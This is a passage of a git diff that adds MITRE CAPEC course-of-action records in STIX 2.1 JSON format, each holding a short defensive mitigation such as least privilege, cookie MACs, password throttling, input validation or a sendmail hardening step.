Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json new file mode 100644 index 0000000000000000000000000000000000000000..ab1b245f47d7d8fe33ab784f618e9be6d5c7368d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fed37a39-3d1a-4511-9f33-34a594097242", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Generate and validate MAC for cookies", + "id": "course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-31-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json new file mode 100644 index 0000000000000000000000000000000000000000..cabf7954520cee1f85d07966ea62b9250c274c2a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3ca7da5f-8dc5-4797-a4d2-1a0ab619ded5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure good compartmentalization in the system to provide protected areas that can be trusted.", + "id": "course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-27-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json new file mode 100644 index 0000000000000000000000000000000000000000..d5bde04bf12644e470f8c35cae2dd6b22df2093a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--238a10ae-8a28-4100-a4a6-986c98784e0e", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json new file mode 100644 index 0000000000000000000000000000000000000000..85eff3cb996cd4e61cd059f2da2f519189ea8c7a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--35505a39-31f2-4107-9433-8e283f1a911a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12.json new file mode 100644 index 0000000000000000000000000000000000000000..1c1459363be49c79728954518e0dc0d2667bcbe2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a10a9d14-72a6-4541-8e83-80b5418c5e0c", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "id": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-635-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json new file mode 100644 index 0000000000000000000000000000000000000000..0a76f48146648e37e0d88840870480ca58eb1028 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c42bc358-13ea-4cff-8502-68e8808786b2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Hide cookie's software information filed.", + "id": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-170-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json new file mode 100644 index 0000000000000000000000000000000000000000..b6f13d8a648e16c7e455c8a17c612fddfb8c8f2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e897dc0d-725a-49cb-bb40-d2297d3675d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json new file mode 100644 index 0000000000000000000000000000000000000000..6804b86357da3cfaa3db2e1c02d793020bc768ce --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f7855bd2-3493-4224-9e39-b76d4fd5e4a7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json new file mode 100644 index 0000000000000000000000000000000000000000..1339346ed8ce62b2fcbf52dbea7de5a0287d5c46 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4168ccb7-c3f1-4a1f-8155-d7e487b61b6b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json new file mode 100644 index 0000000000000000000000000000000000000000..a601ef3ec6e7f2fbcefcfe5cd24d4166eb7fd8b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--91157d60-8a1d-4c9b-946a-85090acc3842", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78.json new file mode 100644 index 0000000000000000000000000000000000000000..f312b1c60664e7e57c02ac91be5ed584febbca9e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f34e8584-00b1-4da7-8eaa-6af0d712e0db", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.", + "id": "course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json new file mode 100644 index 0000000000000000000000000000000000000000..cbb5af48d5817b28d338fca005b92de1d230d090 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f6f452de-dd42-4ec1-ab1d-a90cab514f74", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json new file mode 100644 index 0000000000000000000000000000000000000000..4d72726acd11b2e120a683da8010fe2652cc5101 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d01fc1b0-6816-42d6-9b92-6777d121de2c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json new file mode 100644 index 0000000000000000000000000000000000000000..079982dc943a8c685a8faab20c5689f12197cc0c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2daa468b-f838-42ad-b736-14b305b5a0cd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8.json new file mode 100644 index 0000000000000000000000000000000000000000..66e41c6a22e8f9e5dfedde76286c9bc83ccae9d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--916be92e-1ee9-410b-8996-192295dce08f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)", + "id": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-72-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json new file mode 100644 index 0000000000000000000000000000000000000000..dc8b0a93fa1c7da6b01e1abcc0353971968facab --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--559f1623-0ed1-4ad8-82b5-7212b3eee4e4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json new file mode 100644 index 0000000000000000000000000000000000000000..e8f773172a9e28b082d13274e80e2334a9f214dc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4c48137d-245d-414b-88f6-a676588cb60a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json new file mode 100644 index 0000000000000000000000000000000000000000..a8d68b7457dfa0b48cdd8bab7a79cbae16602d5e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c4388ce9-4870-4c4e-8159-98c6797a3fca", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json new file mode 100644 index 0000000000000000000000000000000000000000..29da1f6f27438575e7e9a2c8862bbb52ec674472 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0ca7f347-a3f3-4363-957f-75be0488295b", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When using Bluetooth, set it to hidden or non-discoverable mode.", + "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d.json new file mode 100644 index 0000000000000000000000000000000000000000..8b3913dcc5a6c847db00b94113409ffe611aac76 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--540f3ccc-a092-40bc-9add-e28d930e562e", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools, such as Checkmarx's \"ChainJacking\" tool, to determine susceptibility to Repo Jacking attacks.", + "id": "course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json new file mode 100644 index 0000000000000000000000000000000000000000..94ff59edda3450b12db35a4453ea8e83ea3c74b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--cd1f7e45-1c94-4a24-8811-bac87686e73a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json new file mode 100644 index 0000000000000000000000000000000000000000..dc13a4d872ac8f2f08493c2724110ee794c9ba1d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--478e0c0e-7f9d-4f9f-a049-35a7cc7d85d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4.json new file mode 100644 index 0000000000000000000000000000000000000000..97e34d28f12d1382a74522c05319b957cf3ef53d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3fb800bf-b364-4905-b94c-5b8bc6b3327c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily 